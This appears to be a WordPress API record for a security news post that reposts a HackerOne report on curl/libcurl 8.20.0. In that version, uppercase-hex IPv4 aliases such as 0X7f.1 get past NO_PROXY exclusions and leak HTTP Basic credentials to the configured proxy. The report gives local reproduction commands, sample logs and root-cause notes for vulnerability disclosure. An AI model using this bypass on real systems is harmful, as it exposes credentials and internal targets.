{"id":59443,"date":"2026-06-03T03:45:41","date_gmt":"2026-06-03T03:45:41","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=59443"},"modified":"2026-06-03T03:45:41","modified_gmt":"2026-06-03T03:45:41","slug":"curl-curllibcurl-8200-noproxy-bypass-via-uppercase-hex-ipv4-aliases-leaks-off-proxy-basic-credential","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=59443","title":{"rendered":"curl: curl\/libcurl 8.20.0 NOPROXY bypass via uppercase-hex IPv4 aliases leaks off-proxy Basic credentials to the configured proxy_H1:3773293"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-06-03T08:27:59&#8243;,&#8221;description&#8221;:&#8221;## Summary:\\ncurl\/libcurl 8.20.0 fails to enforce `CURLOPT_NOPROXY`, `&#8211;noproxy`, and `NO_PROXY` consistently for uppercase-hex IPv4 aliases such as `0X7f.1` on glibc-based systems that accept these legacy numeric IPv4 forms.\\n\\nWhen a canonical IP literal is excluded from proxying, curl sends the canonical form directly as configured. However, an equivalent uppercase-hex alias for the same IP is not recognized by the no-proxy matching path and is instead sent to the configured proxy.\\n\\nIn my reproductions, this causes built-in HTTP Basic credentials to be disclosed to the proxy. This is a proxy-boundary bypass \/ policy-vs-resolution mismatch, not an SSRF claim.\\n\\n## Steps To Reproduce:\\nThe main reproduction below uses the non-debug 8.20.0 CLI path and `NO_PROXY`, which I found to be the strongest and most common policy path. The same root cause also reproduces through `&#8211;noproxy` and `CURLOPT_NOPROXY`; supporting artifacts are attached.\\n\\n1. Build curl 8.20.0 from the official release tarball as a non-debug build:\\n   cd \/tmp\\n   curl -fsSLO https:\/\/curl.se\/download\/curl-8.20.0.tar.xz\\n   mkdir \/tmp\/curl-8.20.0-src \/tmp\/curl-8.20.0-relbuild2\\n   tar -xf \/tmp\/curl-8.20.0.tar.xz -C \/tmp\/curl-8.20.0-src &#8211;strip-components=1\\n   cd \/tmp\/curl-8.20.0-relbuild2\\n   \/tmp\/curl-8.20.0-src\/configure \\\\\\n     &#8211;with-openssl \\\\\\n     &#8211;without-libidn2 \\\\\\n     &#8211;without-libpsl \\\\\\n     &#8211;without-brotli \\\\\\n     &#8211;without-zstd \\\\\\n     &#8211;without-libssh2 \\\\\\n     &#8211;without-nghttp2 \\\\\\n     &#8211;disable-ldap \\\\\\n     &#8211;disable-ldaps \\\\\\n     &#8211;disable-ftp \\\\\\n     &#8211;disable-file \\\\\\n     &#8211;disable-tftp \\\\\\n     &#8211;disable-rtsp \\\\\\n     &#8211;disable-dict \\\\\\n     &#8211;disable-telnet \\\\\\n     &#8211;disable-pop3 \\\\\\n     &#8211;disable-imap \\\\\\n     &#8211;disable-smb \\\\\\n     &#8211;disable-smtp \\\\\\n     &#8211;disable-gopher \\\\\\n     &#8211;disable-mqtt \\\\\\n     &#8211;disable-manual\\n   make -j2\\n\\n2. Start the attached local target\/proxy logger:\\npython3 \/tmp\/curl_proxy_boundary_probe.py\\n\\nThis starts:\\na target on 127.0.0.1:18081\\na logging proxy on 127.0.0.1:18082\\n\\n3. Run the canonical control request:\\nNO_PROXY=127.0.0.1 \\\\\\n\/tmp\/curl-8.20.0-relbuild2\/src\/curl -sv \\\\\\n  &#8211;proxy http:\/\/127.0.0.1:18082 \\\\\\n  -u alice:sekret &#8211;basic \\\\\\n  http:\/\/127.0.0.1:18081\/\\n\\nObserve:\\ncurl connects directly to 127.0.0.1:18081\\nthe response is 200\\n\\n4. Run the uppercase-hex alias request with the same policy:\\nNO_PROXY=127.0.0.1 \\\\\\n\/tmp\/curl-8.20.0-relbuild2\/src\/curl -sv \\\\\\n  &#8211;proxy http:\/\/127.0.0.1:18082 \\\\\\n  -u alice:sekret &#8211;basic \\\\\\n  http:\/\/0X7f.1:18081\/\\n\\nObserve:\\ncurl prints Uses proxy env variable NO_PROXY == &#8216;127.0.0.1&#8217;\\nthe request is sent to the proxy instead of directly to the target\\nthe response is 502 from the logging proxy\\nbuilt-in Authorization: Basic YWxpY2U6c2VrcmV0 is visible in the proxy-side request\\n\\n5. Check the server-side log:\\nsed -n &#8216;1,20p&#8217; \/tmp\/curl_proxy_boundary_probe.log\\n\\nRepresentative result:\\ntarget &#8230; GET \/ &#8230; Host: 127.0.0.1:18081 Authorization: Basic YWxpY2U6c2VrcmV0\\nproxy &#8230; GET http:\/\/0X7f.1:18081\/ &#8230; Host: 0X7f.1:18081 Authorization: Basic YWxpY2U6c2VrcmV0\\n\\n6. Additional verified variants included in the attached bundle:\\n&#8211;noproxy 127.0.0.1\\nNO_PROXY=127.0.0.0\/8\\nCURLOPT_NOPROXY through a non-debug libcurl PoC\\ninternal\/private target classes reproduced in controlled local setups:\\n10.0.0.0\/8\\n172.16.0.0\/12\\n192.168.0.0\/16\\n169.254.169.254\\nsecond full runtime reproduction in a Debian bookworm-slim container\\n\\n###Affected version\\nPrimary affected release reproduced locally from the official source tarball:\\ncurl 8.20.0 (x86_64-pc-linux-gnu) libcurl\/8.20.0 OpenSSL\/3.6.1 zlib\/1.3.1\\nRelease-Date: 2026-04-29\\nProtocols: http https ipfs ipns ws wss\\nFeatures: alt-svc AsynchDNS HSTS HTTPS-proxy IPv6 Largefile libz SSL threadsafe TLS-SRP UnixSockets\\n\\nEnvironment details:\\nhost runtime reproduction on glibc 2.42\\nsecond full runtime reproduction in Debian bookworm-slim (glibc 2.36)\\n\\nI also reproduced the same sink on current master at commit:\\n24874a4f04\\n\\n###Supporting Material\/References:\\nAttached bundle: curl_noproxy_uppercase_hex_bundle_2026-06-01.zip\\nKey included artifacts:\\nnoproxy_env_loopback.log\\ndebian_container_probe.log\\ncurl_noproxy_alias_poc.c\\ncurl_proxy_boundary_probe.py\\nrun_debian_container_noproxy_probe.sh\\nrun_noproxy_private_ns_probe.sh\\nREPORT_curl_noproxy_uppercase_hex.md\\n\\nRoot cause notes:\\nlib\/noproxy.c only takes the IP\/CIDR matching path when inet_pton() accepts the host string as IPv4\\nlib\/urlapi.c normalizes lowercase 0x numeric IPv4 forms, but not uppercase 0X\\nglibc-based resolvers used in my reproductions still accept uppercase-hex legacy numeric IPv4 aliases and resolve them to the same target IP\\nthis creates a policy-vs-resolution mismatch: the configured off-proxy exclusion is not consistently honored for equivalent numeric forms\\n\\n## Impact\\n\\nThis issue breaks the documented off-proxy routing boundary enforced by `CURLOPT_NOPROXY`, `&#8211;noproxy`, and `NO_PROXY`.\\n\\nOn affected glibc-based systems, an uppercase-hex alias for a loopback, RFC1918, or link-local target can cause:\\n- requests that should stay off-proxy to be sent to the configured proxy instead\\n- built-in HTTP Basic credentials generated by curl\/libcurl to be disclosed to the proxy\\n- proxy exclusion policy for sensitive internal targets to be bypassed&#8221;,&#8221;published&#8221;:&#8221;2026-05-31T17:50:15&#8243;,&#8221;modified&#8221;:&#8221;2026-06-03T08:02:40&#8243;,&#8221;type&#8221;:&#8221;hackerone&#8221;,&#8221;title&#8221;:&#8221;curl: curl\/libcurl 8.20.0 NOPROXY bypass via uppercase-hex IPv4 aliases leaks off-proxy Basic credentials to the configured proxy&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;H1:3773293&#8243;,&#8221;bulletinFamily&#8221;:&#8221;bugbounty&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;&#8221;,&#8221;sourceHref&#8221;:&#8221;&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/hackerone.com\/reports\/3773293&#8243;,&#8221;category_name&#8221;:&#8221;News&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-06-03T08:27:59&#8243;,&#8221;description&#8221;:&#8221;## Summary:\\ncurl\/libcurl 8.20.0 fails to enforce `CURLOPT_NOPROXY`, `&#8211;noproxy`, and `NO_PROXY` consistently for uppercase-hex IPv4 aliases such as `0X7f.1` on glibc-based systems that accept these legacy&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,117,13,33,7,11,5],"class_list":["post-59443","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-hackerone","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>curl: curl\/libcurl 8.20.0 NOPROXY bypass via uppercase-hex IPv4 aliases leaks off-proxy Basic credentials to the configured proxy_H1:3773293 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=59443\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"curl: curl\/libcurl 8.20.0 NOPROXY bypass via uppercase-hex IPv4 aliases leaks off-proxy Basic credentials to the configured proxy_H1:3773293 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-06-03T08:27:59&#8243;,&#8221;description&#8221;:&#8221;## Summary:ncurl\/libcurl 8.20.0 fails to enforce `CURLOPT_NOPROXY`, `&#8211;noproxy`, and `NO_PROXY` consistently for uppercase-hex IPv4 aliases such as `0X7f.1` on glibc-based systems that accept these legacy...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=59443\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-06-03T03:45:41+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59443#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59443\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"curl: curl\\\/libcurl 8.20.0 NOPROXY bypass via uppercase-hex IPv4 aliases leaks off-proxy Basic credentials to the configured proxy_H1:3773293\",\"datePublished\":\"2026-06-03T03:45:41+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59443\"},\"wordCount\":867,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"hackerone\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_news\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=59443#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59443\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59443\",\"name\":\"curl: curl\\\/libcurl 8.20.0 NOPROXY bypass via uppercase-hex IPv4 aliases leaks off-proxy Basic credentials to the configured proxy_H1:3773293 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-06-03T03:45:41+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59443#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=59443\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59443#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"curl: curl\\\/libcurl 8.20.0 NOPROXY bypass via uppercase-hex IPv4 aliases leaks off-proxy Basic credentials to the configured proxy_H1:3773293\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"curl: curl\/libcurl 8.20.0 NOPROXY bypass via uppercase-hex IPv4 aliases leaks off-proxy Basic credentials to the configured proxy_H1:3773293 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=59443","og_locale":"en_US","og_type":"article","og_title":"curl: curl\/libcurl 8.20.0 NOPROXY bypass via uppercase-hex IPv4 aliases leaks off-proxy Basic credentials to the configured proxy_H1:3773293 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-06-03T08:27:59&#8243;,&#8221;description&#8221;:&#8221;## Summary:ncurl\/libcurl 8.20.0 fails to enforce `CURLOPT_NOPROXY`, `&#8211;noproxy`, and `NO_PROXY` consistently for uppercase-hex IPv4 aliases such as `0X7f.1` on glibc-based systems that accept these legacy...","og_url":"https:\/\/zero.redgem.net\/?p=59443","og_site_name":"zero redgem","article_published_time":"2026-06-03T03:45:41+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=59443#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=59443"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"curl: curl\/libcurl 8.20.0 NOPROXY bypass via uppercase-hex IPv4 aliases leaks off-proxy Basic credentials to the configured proxy_H1:3773293","datePublished":"2026-06-03T03:45:41+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=59443"},"wordCount":867,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","hackerone","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_news"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=59443#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=59443","url":"https:\/\/zero.redgem.net\/?p=59443","name":"curl: curl\/libcurl 8.20.0 NOPROXY bypass via uppercase-hex IPv4 aliases leaks off-proxy Basic credentials to the configured proxy_H1:3773293 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-06-03T03:45:41+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=59443#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=59443"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=59443#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"curl: curl\/libcurl 8.20.0 NOPROXY bypass via uppercase-hex IPv4 aliases leaks off-proxy Basic credentials to the configured proxy_H1:3773293"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/59443","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=59443"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/59443\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=59443"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=59443"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=59443"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}